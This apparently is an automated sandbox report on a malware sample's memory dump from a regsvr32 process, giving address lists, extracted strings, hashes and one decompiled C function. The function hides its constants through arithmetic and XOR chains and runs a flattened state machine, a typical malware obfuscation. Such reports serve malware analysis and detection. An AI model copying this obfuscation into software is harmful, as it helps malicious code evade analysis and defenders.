0x04b3b324
0x04b3b32d
0x04b3b330
0x04b3b33c
0x04b3b340
0x04b3b348
0x04b3b35a
0x04b3b35d
0x04b3b364
0x04b3b36f
0x04b3b377
0x04b3b37f
0x04b3b384
0x04b3b389
0x04b3b391
0x04b3b39c
0x04b3b3a7
0x04b3b3b2
0x04b3b3ba
0x04b3b3c2
0x04b3b3cf
0x04b3b3d3
0x04b3b3e2
0x04b3b3e7
0x04b3b3ee
0x04b3b3ee
0x04b3b3f0
0x04b3b3f0
0x04b3b3f0
0x04b3b3f0
0x04b3b3f6
0x00000000
0x00000000
0x04b3b3fc
0x04b3b668
0x04b3b66e
0x04b3b66f
0x00000000
0x04b3b402
0x04b3b408
0x04b3b5b7
0x04b3b5c0
0x04b3b5c4
0x04b3b5da
0x04b3b61d
0x04b3b629
0x04b3b640
0x04b3b645
0x04b3b648
0x00000000
0x04b3b40e
0x04b3b414
0x04b3b57a
0x04b3b599
0x04b3b5a5
0x04b3b5aa
0x04b3b5ad
0x00000000
0x04b3b41a
0x04b3b420
0x04b3b473
0x04b3b49b
0x04b3b4bc
0x04b3b4c9
0x04b3b4cd
0x04b3b4d4
0x04b3b523
0x04b3b543
0x04b3b548
0x04b3b561
0x04b3b567
0x04b3b568
0x04b3b56a
0x04b3b570
0x00000000
0x04b3b570
0x04b3b422
0x04b3b428
0x00000000
0x04b3b814
0x04b3b434
0x00000000
0x04b3b43a
0x04b3b451
0x04b3b457
0x04b3b458
0x00000000
0x04b3b458
0x00000000
0x04b3b434
0x04b3b420
0x04b3b414
0x04b3b408
0x04b3b81f
0x04b3b81f
0x00000000
0x04b3b81f
0x04b3b679
0x04b3b67f
0x04b3b7d3
0x04b3b7d8
0x04b3b7db
0x04b3b7dc
0x04b3b7de
0x04b3b7ea
0x00000000
0x04b3b7e0
0x04b3b7e0
0x00000000
0x04b3b7e0
0x00000000
0x04b3b685
0x04b3b685
0x04b3b68b
0x04b3b78e
0x04b3b79c
0x04b3b7a6
0x04b3b7ae
0x04b3b7af
0x00000000
0x04b3b691
0x04b3b691
0x04b3b697
0x04b3b753
0x04b3b767
0x04b3b76e
0x04b3b773
0x04b3b776
0x00000000
0x04b3b69d
0x04b3b69d
0x04b3b6a3
0x00000000
0x04b3b6a9
0x04b3b6c3
0x04b3b6ca
0x04b3b6cf
0x04b3b6ed
0x04b3b71c
0x04b3b723
0x04b3b728
0x04b3b72b
0x04b3b72d
0x04b3b733
0x00000000
0x04b3b733
0x04b3b72d
0x04b3b6a3
0x04b3b697
0x04b3b68b
0x00000000
0x04b3b7ef
0x04b3b7ef
0x04b3b7ef
0x00000000

Strings

l+}, xrefs: 04B3B309
/e, xrefs: 04B3ABEA
h, xrefs: 04B3ABA4
xs,, xrefs: 04B3AAF1
9, xrefs: 04B3B176
QGgf, xrefs: 04B3ADBA
05, xrefs: 04B3AEE5
BbJ, xrefs: 04B3A981
\\, xrefs: 04B3AA54
HMJ9, xrefs: 04B3AFE7
!., xrefs: 04B3AE4A
K, xrefs: 04B3B186
B:, xrefs: 04B3AC44
uv, xrefs: 04B3AE55
~63, xrefs: 04B3AC1E, 04B3AF4D, 04B3AF5E
N , xrefs: 04B3ACB7
$P, xrefs: 04B3A936
2iJ, xrefs: 04B3B022
~63, xrefs: 04B3B753

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: h$!.$$P$/e$05$2iJ$B:$BbJ$HMJ9$K$N $QGgf$\\$uv$xs,$~63$~63$9$l+}
API String ID: 0-4215899151
Opcode ID: 88ff999b13cbe432b0f33b7043b3771fce1892693f959bd7af6c9bf669815935
Instruction ID: afcc0e5647b905163692aafca64e78b6ffd944fd3b3b052fd14464ae3b0d0016
Opcode Fuzzy Hash: 88ff999b13cbe432b0f33b7043b3771fce1892693f959bd7af6c9bf669815935
Instruction Fuzzy Hash: 1E72EF725093819FD378CF21D54AB8BBBE2BBC4308F10891DE5D996260DBB19959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B40F86, Relevance: 23.2, Strings: 18, Instructions: 723
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B40F86(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				void* _t824;
				void* _t825;
				void* _t829;
				void* _t832;
				void* _t844;
				void* _t850;
				void* _t853;
				signed int _t860;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				void* _t882;
				void* _t901;
				void* _t957;
				intOrPtr _t975;
				intOrPtr* _t978;
				signed int _t980;
				signed int _t981;
				void* _t982;
				intOrPtr _t986;
				void* _t987;
				void* _t994;
				void* _t996;

				_t978 = __ecx;
				_v96 = __ecx;
				_v88 = 0xce16ef;
				_t986 = 0;
				_t853 = 0x87433f6;
				_v84 = 0;
				_v80 = 0;
				_v412 = 0xef09b0;
				_v412 = _v412 + 0xffff239a;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 + 0xffffb1af;
				_v412 = _v412 ^ 0xffffb567;
				_v144 = 0xb2550e;
				_v144 = _v144 << 6;
				_v144 = _v144 ^ 0x2c954380;
				_v160 = 0xa1df5c;
				_v160 = _v160 * 0x60;
				_v160 = _v160 ^ 0x3cb3c280;
				_v288 = 0x7a32d8;
				_v288 = _v288 | 0x8c6c9666;
				_v288 = _v288 ^ 0x041f8caf;
				_v288 = _v288 ^ 0x88613a51;
				_v348 = 0xdf5e12;
				_v348 = _v348 | 0xa5ea5eb7;
				_v348 = _v348 ^ 0xa5ff5eb7;
				_v296 = 0x7009ff;
				_v296 = _v296 + 0xffff1527;
				_v296 = _v296 + 0x576a;
				_v296 = _v296 ^ 0x006f7690;
				_v372 = 0x1f54b;
				_t860 = 0x52;
				_v372 = _v372 * 0x5a;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 / _t860;
				_v372 = _v372 ^ 0x00000044;
				_v332 = 0x772df1;
				_v332 = _v332 + 0x4853;
				_v332 = _v332 ^ 0x166147d5;
				_v332 = _v332 ^ 0x16163191;
				_v240 = 0x1a1abb;
				_v240 = _v240 ^ 0xbdfc81b5;
				_v240 = _v240 | 0x1ef02f35;
				_v240 = _v240 ^ 0xbff6bf3f;
				_v232 = 0x620327;
				_v232 = _v232 + 0xffffc934;
				_t861 = 0x13;
				_v232 = _v232 / _t861;
				_v232 = _v232 ^ 0x000525b3;
				_v208 = 0xe2fff2;
				_t980 = 0x39;
				_v208 = _v208 * 0x78;
				_v208 = _v208 ^ 0x6a67f970;
				_v344 = 0xf3734c;
				_v344 = _v344 >> 0x10;
				_v344 = _v344 / _t980;
				_v344 = _v344 ^ 0x00000004;
				_v300 = 0x170e40;
				_v300 = _v300 | 0xfbde795f;
				_v300 = _v300 ^ 0xfbde9330;
				_v260 = 0xd4f3ae;
				_v260 = _v260 ^ 0x9e22b963;
				_v260 = _v260 * 0x2e;
				_v260 = _v260 ^ 0x904fea8f;
				_v356 = 0x4c8d9b;
				_v356 = _v356 | 0xd47535dd;
				_v356 = _v356 + 0xffffd433;
				_t862 = 0x64;
				_v356 = _v356 * 0x59;
				_v356 = _v356 ^ 0xdfa15942;
				_v308 = 0xbd9260;
				_v308 = _v308 >> 0xe;
				_v308 = _v308 * 0x79;
				_v308 = _v308 ^ 0x000cbe7b;
				_v252 = 0xa2f51d;
				_v252 = _v252 + 0x749;
				_v252 = _v252 << 0xd;
				_v252 = _v252 ^ 0x5f854687;
				_v292 = 0x216e58;
				_v292 = _v292 / _t862;
				_v292 = _v292 + 0xffff8880;
				_v292 = _v292 ^ 0xfff3b1bc;
				_v176 = 0xac4eb4;
				_v176 = _v176 | 0xd866b52c;
				_v176 = _v176 ^ 0xd8e8b8b7;
				_v236 = 0x7a6201;
				_v236 = _v236 ^ 0x2461ec4e;
				_t863 = 0xa;
				_v236 = _v236 * 0x35;
				_v236 = _v236 ^ 0x79bb4b53;
				_v220 = 0xf5a9fb;
				_v220 = _v220 << 1;
				_v220 = _v220 >> 5;
				_v220 = _v220 ^ 0x000a39a7;
				_v380 = 0x7beff6;
				_v380 = _v380 / _t863;
				_v380 = _v380 | 0x5a206f9b;
				_v380 = _v380 * 0x3d;
				_v380 = _v380 ^ 0x7c9823d9;
				_v284 = 0xdc7201;
				_v284 = _v284 ^ 0xec4f9d75;
				_v284 = _v284 << 8;
				_v284 = _v284 ^ 0x93e140b6;
				_v396 = 0x36b797;
				_v396 = _v396 + 0x83f2;
				_v396 = _v396 | 0xb5da4ffa;
				_v396 = _v396 ^ 0x8c9f27f1;
				_v396 = _v396 ^ 0x3962cb66;
				_v364 = 0x608af6;
				_v364 = _v364 >> 0xe;
				_v364 = _v364 ^ 0xb06c2668;
				_v364 = _v364 >> 0xa;
				_v364 = _v364 ^ 0x0022b374;
				_v404 = 0xe18b1f;
				_v404 = _v404 + 0xffff49de;
				_v404 = _v404 + 0xffffa950;
				_v404 = _v404 >> 5;
				_v404 = _v404 ^ 0x000802e7;
				_v168 = 0x720eed;
				_v168 = _v168 | 0xf4577aa8;
				_v168 = _v168 ^ 0xf4704e8f;
				_v328 = 0x5e39f;
				_v328 = _v328 * 0x2a;
				_v328 = _v328 ^ 0x47860790;
				_v328 = _v328 ^ 0x47706e69;
				_v336 = 0xdd3db6;
				_v336 = _v336 ^ 0x0be1064e;
				_v336 = _v336 ^ 0xe0fa941c;
				_v336 = _v336 ^ 0xebc1ff07;
				_v340 = 0x8bacdf;
				_t864 = 0x49;
				_v340 = _v340 / _t864;
				_t865 = 0x77;
				_v340 = _v340 * 0x4d;
				_v340 = _v340 ^ 0x0099a7e7;
				_v440 = 0x29fcf0;
				_v440 = _v440 >> 4;
				_v440 = _v440 ^ 0x37539152;
				_v440 = _v440 / _t865;
				_v440 = _v440 ^ 0x007580f6;
				_v400 = 0x753dd5;
				_v400 = _v400 ^ 0x142a6b84;
				_v400 = _v400 ^ 0x6d30c2ad;
				_v400 = _v400 ^ 0xe014bebf;
				_v400 = _v400 ^ 0x997c2220;
				_v128 = 0x8b3cd;
				_v128 = _v128 << 2;
				_v128 = _v128 ^ 0x002b9a55;
				_v408 = 0x5fd2f;
				_v408 = _v408 >> 9;
				_t866 = 0x69;
				_v408 = _v408 * 0x53;
				_v408 = _v408 * 0x58;
				_v408 = _v408 ^ 0x00501640;
				_v416 = 0x7e5e32;
				_v416 = _v416 | 0x37c3b1cb;
				_v416 = _v416 + 0x4e4b;
				_v416 = _v416 | 0xc7e68b70;
				_v416 = _v416 ^ 0xffec3e94;
				_v304 = 0xac72e0;
				_v304 = _v304 + 0xffff9516;
				_v304 = _v304 | 0x0ab72207;
				_v304 = _v304 ^ 0x0aba1474;
				_v424 = 0x91a63a;
				_v424 = _v424 | 0xeda6ffa9;
				_v424 = _v424 ^ 0xa7761782;
				_v424 = _v424 << 0xe;
				_v424 = _v424 ^ 0x7a08e30a;
				_v436 = 0x9e7f8b;
				_v436 = _v436 | 0x84ca61f6;
				_v436 = _v436 << 2;
				_v436 = _v436 * 0x3e;
				_v436 = _v436 ^ 0xb78cfbfa;
				_v216 = 0x303808;
				_v216 = _v216 + 0xef78;
				_v216 = _v216 / _t980;
				_v216 = _v216 ^ 0x000455e2;
				_v312 = 0x19b522;
				_v312 = _v312 << 7;
				_v312 = _v312 ^ 0x11162953;
				_v312 = _v312 ^ 0x1dcfd305;
				_v212 = 0x8a6fc0;
				_v212 = _v212 << 9;
				_v212 = _v212 ^ 0x14d4ca12;
				_v276 = 0xdb7845;
				_v276 = _v276 / _t866;
				_v276 = _v276 * 0x1c;
				_v276 = _v276 ^ 0x003237f1;
				_v124 = 0x91e545;
				_t867 = 0x7b;
				_v124 = _v124 / _t867;
				_v124 = _v124 ^ 0x0004745c;
				_v192 = 0x2154b3;
				_v192 = _v192 ^ 0x5324a52c;
				_v192 = _v192 ^ 0x530d1a47;
				_v140 = 0x7913eb;
				_v140 = _v140 | 0xe487e648;
				_v140 = _v140 ^ 0xe4fd51cb;
				_v428 = 0x8a554f;
				_v428 = _v428 << 1;
				_v428 = _v428 + 0xffff493d;
				_v428 = _v428 | 0x8f4663f4;
				_v428 = _v428 ^ 0x8f592165;
				_v200 = 0x5c4830;
				_v200 = _v200 + 0xffffe35d;
				_v200 = _v200 ^ 0x00549f8c;
				_v132 = 0x6e2e79;
				_t377 =  &_v132; // 0x6e2e79
				_t981 = 0x62;
				_v132 =  *_t377 / _t981;
				_v132 = _v132 ^ 0x000a369f;
				_v244 = 0x1d0d9a;
				_t868 = 0x6e;
				_v244 = _v244 / _t868;
				_v244 = _v244 ^ 0xec9a9004;
				_v244 = _v244 ^ 0xec94e609;
				_v148 = 0xd4a92;
				_v148 = _v148 + 0xffffbc3f;
				_v148 = _v148 ^ 0x00088ca7;
				_v184 = 0x3666a0;
				_v184 = _v184 >> 0xb;
				_v184 = _v184 ^ 0x00096f18;
				_v228 = 0x713966;
				_v228 = _v228 << 3;
				_v228 = _v228 << 0xb;
				_v228 = _v228 ^ 0x4e5b426e;
				_v316 = 0xec09e9;
				_v316 = _v316 << 7;
				_t869 = 0x78;
				_v316 = _v316 / _t869;
				_v316 = _v316 ^ 0x00fe5880;
				_v268 = 0x8ffe81;
				_v268 = _v268 + 0xffff4311;
				_v268 = _v268 ^ 0x56e15418;
				_v268 = _v268 ^ 0x566a144b;
				_v324 = 0x9f4c2e;
				_v324 = _v324 >> 4;
				_v324 = _v324 | 0x903f3b4d;
				_v324 = _v324 ^ 0x9031b6d7;
				_v196 = 0x6080cf;
				_v196 = _v196 << 0xe;
				_v196 = _v196 ^ 0x203ba000;
				_v256 = 0x4bba45;
				_v256 = _v256 + 0xc17c;
				_v256 = _v256 | 0x95e268b8;
				_v256 = _v256 ^ 0x95e68234;
				_v264 = 0x7821fc;
				_v264 = _v264 << 3;
				_t870 = 0x34;
				_v264 = _v264 / _t870;
				_v264 = _v264 ^ 0x001694e5;
				_v204 = 0x96f3a5;
				_v204 = _v204 * 0x24;
				_v204 = _v204 ^ 0x153e3a4b;
				_v368 = 0xbef911;
				_t871 = 0xe;
				_v368 = _v368 / _t871;
				_v368 = _v368 >> 0xb;
				_v368 = _v368 + 0x5de4;
				_v368 = _v368 ^ 0x00021c01;
				_v376 = 0x377d04;
				_v376 = _v376 + 0xcef;
				_v376 = _v376 ^ 0x9e466b70;
				_t872 = 0x59;
				_v376 = _v376 * 0x6b;
				_v376 = _v376 ^ 0x399834bf;
				_v180 = 0x6632ea;
				_v180 = _v180 | 0x3a3e38fd;
				_v180 = _v180 ^ 0x3a73a81b;
				_v248 = 0x142cd9;
				_v248 = _v248 / _t872;
				_v248 = _v248 / _t981;
				_v248 = _v248 ^ 0x0001d965;
				_v188 = 0x88b8e9;
				_v188 = _v188 + 0xffff5f5f;
				_v188 = _v188 ^ 0x0087927e;
				_v164 = 0x9c013d;
				_t873 = 0xa;
				_v164 = _v164 / _t873;
				_v164 = _v164 ^ 0x0004ead6;
				_v172 = 0x53b5f1;
				_v172 = _v172 + 0xd9f2;
				_v172 = _v172 ^ 0x005588af;
				_v360 = 0xd6ac8a;
				_v360 = _v360 | 0xfdf9fa5f;
				_v360 = _v360 ^ 0xfdfecc4d;
				_v224 = 0xfb951e;
				_v224 = _v224 + 0xffff2e4c;
				_v224 = _v224 + 0x8dcd;
				_v224 = _v224 ^ 0x00f1d24a;
				_v272 = 0x6e5d6f;
				_v272 = _v272 << 2;
				_t874 = 0x6f;
				_v272 = _v272 / _t874;
				_v272 = _v272 ^ 0x000d7a86;
				_v384 = 0x15dc31;
				_v384 = _v384 + 0xfffffc55;
				_v384 = _v384 << 0x10;
				_v384 = _v384 >> 0xa;
				_v384 = _v384 ^ 0x003c4753;
				_v392 = 0x7bc513;
				_v392 = _v392 * 0x54;
				_v392 = _v392 | 0xe01c3b63;
				_v392 = _v392 + 0xe1b2;
				_v392 = _v392 ^ 0xe89c6b16;
				_v420 = 0x6862b7;
				_v420 = _v420 ^ 0x841c6550;
				_v420 = _v420 + 0xd52;
				_v420 = _v420 >> 0x10;
				_v420 = _v420 ^ 0x000e8d54;
				_v388 = 0x19484a;
				_t982 = 0x6f661e6;
				_t875 = 0x68;
				_v388 = _v388 / _t875;
				_t876 = 0xd;
				_v92 = 0x100;
				_v388 = _v388 * 0x61;
				_v388 = _v388 << 6;
				_v388 = _v388 ^ 0x05e5c873;
				_v432 = 0xb160;
				_v432 = _v432 * 0x78;
				_v432 = _v432 >> 8;
				_v432 = _v432 ^ 0xee0de4a9;
				_v432 = _v432 ^ 0xee0e3c37;
				_v320 = 0x436488;
				_v320 = _v320 * 0x7d;
				_v320 = _v320 * 0x24;
				_v320 = _v320 ^ 0xa0a81f1c;
				_v136 = 0x73af31;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 ^ 0x0004ab53;
				_v120 = 0xd23217;
				_v120 = _v120 | 0x86b48086;
				_v120 = _v120 ^ 0x86fe303d;
				_v280 = 0x567562;
				_v280 = _v280 / _t876;
				_v280 = _v280 + 0xffff7ef5;
				_v280 = _v280 ^ 0x00098751;
				_v152 = 0x24c9f6;
				_v152 = _v152 + 0x7f22;
				_v152 = _v152 ^ 0x002f2944;
				_v156 = 0xe548b;
				_v156 = _v156 + 0xe219;
				_v156 = _v156 ^ 0x000a95de;
				_v352 = 0xccf4e9;
				_v352 = _v352 | 0x0ed71748;
				_v352 = _v352 + 0xefd9;
				_v352 = _v352 << 3;
				_v352 = _v352 ^ 0x770f1835;
				while(1) {
					L1:
					while(1) {
						L2:
						while(1) {
							L3:
							_t957 = 0xaefec99;
							do {
								while(1) {
									L4:
									_t996 = _t853 - 0x89f995e;
									if(_t996 > 0) {
										break;
									}
									if(_t996 == 0) {
										L04B4C237(_v108, _v432, _v320, _v136);
										_t853 = 0xc502d5f;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t853 == 0x49f634) {
											_push(_v308);
											_push(_v356);
											_push(_v260);
											_t832 = E04B4E1F8(0x4b313d8, _v300, __eflags);
											_push(_v236);
											_push(_v176);
											_push(_v292);
											__eflags = L04B3738A(_v220, _t832, _v380, _v412,  &_v112, E04B4E1F8(0x4b31318, _v252, __eflags), _v284) - _v144;
											_t853 =  ==  ? 0xc917448 : 0x468e224;
											E04B4FECB(_t832, _v396, _v364, _v404, _v168);
											E04B4FECB(_t833, _v328, _v336, _v340, _v440);
											_t978 = _v96;
											_t987 = _t987 + 0x44;
											goto L31;
										} else {
											if(_t853 == 0x1281fcd) {
												E04B32EBF(_v420, _v104, _v388);
												_t853 = 0x89f995e;
												while(1) {
													L1:
													goto L2;
												}
											} else {
												if(_t853 == _t824) {
													_push(_v212);
													_push(_v312);
													_push(_v216);
													_t985 = E04B4E1F8(0x4b31368, _v436, __eflags);
													_t901 = 0x48;
													_v100 = 0x4b31368;
													_t844 = E04B516C0(_v276, 0x4b31368, _v116,  &_v100, _v124, _v192, _t841, _v140, _v428, _t901, _v372, _v200, _v132,  &_v76);
													_t994 = _t987 + 0x3c;
													__eflags = _t844 - _v332;
													if(_t844 != _v332) {
														_t853 = 0xc502d5f;
													} else {
														_t975 =  *0x4b56224; // 0x0
														E04B4C9B0(_v244, _t975 + 8, _v148, 0x40,  &_v68, _v184);
														_t994 = _t994 + 0x10;
														_t853 = 0x9badbc8;
													}
													E04B4FECB(_t985, _v228, _v316, _v268, _v324);
													_t987 = _t994 + 0xc;
													L31:
													_t982 = 0x6f661e6;
													_t824 = 0x38eaa65;
													_t882 = 0xe81b6a7;
													_t957 = 0xaefec99;
													goto L32;
												} else {
													if(_t853 == 0x5c5114f) {
														E04B3F7FE(_v156, _v112, _v352, _v344);
													} else {
														if(_t853 == _t982) {
															_t850 = E04B33431(_v104);
															_t853 = 0x1281fcd;
															__eflags = _t850;
															_t986 =  !=  ? 1 : _t986;
															while(1) {
																L1:
																L2:
																L3:
																_t957 = 0xaefec99;
																goto L4;
															}
														} else {
															if(_t853 != 0x87433f6) {
																goto L32;
															} else {
																_t853 = 0x49f634;
																continue;
															}
														}
													}
												}
											}
										}
									}
									L35:
									return _t986;
								}
								__eflags = _t853 - 0x9badbc8;
								if(__eflags == 0) {
									_push(_v204);
									_push(_v264);
									_push(_v256);
									__eflags = E04B3BC32( *((intOrPtr*)(_t978 + 4)),  &_v108, _v240, _v368, _v376, E04B4E1F8(0x4b31368, _v196, __eflags),  *_t978, _v180, _v248, _v112, 0x4b31368, _v188) - _v232;
									_t853 =  ==  ? 0xaefec99 : 0xc502d5f;
									E04B4FECB(_t819, _v164, _v172, _v360, _v224);
									_t987 = _t987 + 0x40;
									goto L31;
								} else {
									__eflags = _t853 - _t957;
									if(_t853 == _t957) {
										_t825 = E04B351E7( &_v104, _v272, _v116, _v108, _v208, _v384, _v392);
										_t987 = _t987 + 0x14;
										__eflags = _t825;
										_t853 =  ==  ? _t982 : 0x89f995e;
										goto L1;
									} else {
										__eflags = _t853 - 0xc502d5f;
										if(_t853 == 0xc502d5f) {
											L04B4C237(_v116, _v120, _v280, _v152);
											_t853 = 0x5c5114f;
											while(1) {
												L1:
												goto L2;
											}
										} else {
											__eflags = _t853 - 0xc917448;
											if(_t853 == 0xc917448) {
												_v100 = _v92;
												_t829 = L04B543E6(_v400, _v128, _v408, _v112, _v416, _v160,  &_v116, _v92);
												_t987 = _t987 + 0x18;
												__eflags = _t829 - _v288;
												_t882 = 0xe81b6a7;
												_t824 = 0x38eaa65;
												_t853 =  ==  ? 0xe81b6a7 : 0x5c5114f;
												goto L3;
											} else {
												__eflags = _t853 - _t882;
												if(_t853 != _t882) {
													goto L32;
												} else {
													__eflags = L04B4C2CF(_v304, _v348, _v424, _v116) - _v296;
													_t824 = 0x38eaa65;
													_t853 =  ==  ? 0x38eaa65 : 0xc502d5f;
													goto L2;
												}
											}
										}
									}
								}
								goto L35;
								L32:
								__eflags = _t853 - 0x468e224;
							} while (__eflags != 0);
							goto L35;
						}
					}
				}
			}

0x04b40f90
0x04b40f92
0x04b40f99
0x04b40fa6
0x04b40fa8
0x04b40fad
0x04b40fb4
0x04b40fbb
0x04b40fc3
0x04b40fcb
0x04b40fd0
0x04b40fd8
0x04b40fe0
0x04b40feb
0x04b40ff3
0x04b40ffe
0x04b41013
0x04b4101a
0x04b41025
0x04b41030
0x04b4103b
0x04b41046
0x04b41051
0x04b41059
0x04b41061
0x04b41069
0x04b41074
0x04b4107f
0x04b4108a
0x04b41095
0x04b410a2
0x04b410a5
0x04b410a9
0x04b410b6
0x04b410ba
0x04b410bf
0x04b410ca
0x04b410d5
0x04b410e0
0x04b410eb
0x04b410f6
0x04b41101
0x04b4110c
0x04b41117
0x04b41122
0x04b41134
0x04b41139
0x04b41142
0x04b4114d
0x04b41160
0x04b41161
0x04b41168
0x04b41173
0x04b4117b
0x04b41186
0x04b4118a
0x04b4118f
0x04b4119a
0x04b411a5
0x04b411b0
0x04b411bb
0x04b411ce
0x04b411d7
0x04b411e2
0x04b411ea
0x04b411f2
0x04b41201
0x04b41204
0x04b41208
0x04b41210
0x04b4121b
0x04b4122b
0x04b41232
0x04b4123d
0x04b41248
0x04b41253
0x04b4125b
0x04b41266
0x04b4127c
0x04b41283
0x04b4128e
0x04b41299
0x04b412a4
0x04b412af
0x04b412ba
0x04b412c5
0x04b412d8
0x04b412d9
0x04b412e0
0x04b412eb
0x04b412f6
0x04b412fd
0x04b41305
0x04b41310
0x04b4131e
0x04b41322
0x04b4132f
0x04b41333
0x04b4133b
0x04b41346
0x04b41351
0x04b41359
0x04b41364
0x04b4136c
0x04b41374
0x04b4137c
0x04b41384
0x04b4138c
0x04b41394
0x04b41399
0x04b413a1
0x04b413a6
0x04b413ae
0x04b413b6
0x04b413be
0x04b413c6
0x04b413cb
0x04b413d3
0x04b413de
0x04b413e9
0x04b413f4
0x04b41407
0x04b4140e
0x04b41419
0x04b41424
0x04b4142c
0x04b41434
0x04b4143c
0x04b41444
0x04b41454
0x04b41459
0x04b41464
0x04b41467
0x04b4146b
0x04b41473
0x04b4147b
0x04b41480
0x04b41490
0x04b41494
0x04b4149c
0x04b414a4
0x04b414ac
0x04b414b4
0x04b414bc
0x04b414c4
0x04b414cf
0x04b414d7
0x04b414e2
0x04b414ea
0x04b414f4
0x04b414f5
0x04b414fe
0x04b41502
0x04b4150a
0x04b41512
0x04b4151a
0x04b41522
0x04b4152a
0x04b41532
0x04b4153d
0x04b41548
0x04b41553
0x04b4155e
0x04b41566
0x04b4156e
0x04b41576
0x04b4157b
0x04b41583
0x04b4158b
0x04b41593
0x04b4159d
0x04b415a1
0x04b415a9
0x04b415b4
0x04b415ca
0x04b415d1
0x04b415dc
0x04b415e7
0x04b415ef
0x04b415fa
0x04b41605
0x04b41610
0x04b41618
0x04b41623
0x04b41637
0x04b41646
0x04b4164d
0x04b4165a
0x04b4166e
0x04b41673
0x04b4167c
0x04b41687
0x04b41692
0x04b4169d
0x04b416a8
0x04b416b3
0x04b416be
0x04b416c9
0x04b416d1
0x04b416d5
0x04b416dd
0x04b416e5
0x04b416ed
0x04b416f8
0x04b41703
0x04b4170e
0x04b41719
0x04b41720
0x04b41725
0x04b4172e
0x04b41739
0x04b4174b
0x04b41750
0x04b41759
0x04b41764
0x04b4176f
0x04b4177a
0x04b41785
0x04b41790
0x04b4179b
0x04b417a3
0x04b417ae
0x04b417b9
0x04b417c1
0x04b417c9
0x04b417d4
0x04b417df
0x04b417ee
0x04b417f3
0x04b417fc
0x04b41807
0x04b41812
0x04b4181d
0x04b41828
0x04b41833
0x04b4183e
0x04b41846
0x04b41851
0x04b4185c
0x04b41867
0x04b4186f
0x04b4187a
0x04b41885
0x04b41890
0x04b4189b
0x04b418a6
0x04b418b1
0x04b418c0
0x04b418c3
0x04b418ca
0x04b418d5
0x04b418e8
0x04b418f1
0x04b418fc
0x04b4190a
0x04b4190f
0x04b41913
0x04b41918
0x04b41920
0x04b41928
0x04b41930
0x04b41938
0x04b41947
0x04b4194a
0x04b4194e
0x04b41956
0x04b41961
0x04b4196c
0x04b41977
0x04b4198d
0x04b4199f
0x04b419a6
0x04b419b1
0x04b419bc
0x04b419c7
0x04b419d2
0x04b419e4
0x04b419e9
0x04b419f2
0x04b419fd
0x04b41a08
0x04b41a13
0x04b41a1e
0x04b41a26
0x04b41a36
0x04b41a3e
0x04b41a49
0x04b41a54
0x04b41a5f
0x04b41a6a
0x04b41a75
0x04b41a84
0x04b41a87
0x04b41a8e
0x04b41a99
0x04b41aa1
0x04b41aa9
0x04b41aae
0x04b41ab3
0x04b41abb
0x04b41ac8
0x04b41acc
0x04b41ad4
0x04b41adc
0x04b41ae4
0x04b41aec
0x04b41af4
0x04b41afc
0x04b41b01
0x04b41b09
0x04b41b17
0x04b41b1e
0x04b41b23
0x04b41b2e
0x04b41b2f
0x04b41b3a
0x04b41b3e
0x04b41b43
0x04b41b4b
0x04b41b58
0x04b41b5c
0x04b41b61
0x04b41b69
0x04b41b71
0x04b41b84
0x04b41b93
0x04b41b9a
0x04b41ba5
0x04b41bb0
0x04b41bb8
0x04b41bc3
0x04b41bce
0x04b41bd9
0x04b41be4
0x04b41bf8
0x04b41bff
0x04b41c0a
0x04b41c15
0x04b41c20
0x04b41c2b
0x04b41c36
0x04b41c41
0x04b41c4c
0x04b41c57
0x04b41c5f
0x04b41c67
0x04b41c6f
0x04b41c74
0x04b41c7c
0x04b41c7c
0x04b41c81
0x04b41c81
0x04b41c86
0x04b41c86
0x04b41c86
0x04b41c8b
0x04b41c8b
0x04b41c8b
0x04b41c8b
0x04b41c91
0x00000000
0x00000000
0x04b41c97
0x04b41f03
0x04b41f0a
0x04b41c7c
0x04b41c7c
0x00000000
0x04b41c7c
0x04b41c9d
